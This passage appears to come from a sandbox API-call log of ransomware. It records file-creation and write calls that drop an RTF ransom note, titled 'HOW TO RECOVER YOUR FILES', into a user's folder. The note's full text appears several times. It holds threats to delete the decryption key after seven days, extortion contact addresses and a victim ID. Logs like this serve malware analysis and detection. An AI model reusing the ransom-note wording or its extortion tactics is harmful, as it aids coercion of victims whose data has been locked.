g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nEwJVUzEVMBMGA1UEChMMRGl\x93/", lpUsedDefaultChar=0x0) returned 8717 [0298.813] WriteFile (in: hFile=0x27c, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.814] CloseHandle (hObject=0x27c) returned 1 [0298.814] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ig-ng\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ig-ng\\#readme_eman#.rtf")) returned 0xffffffff [0298.814] GetLastError () returned 0x2 [0298.814] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ig-ng\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ig-ng\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.815] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.815] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.815] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 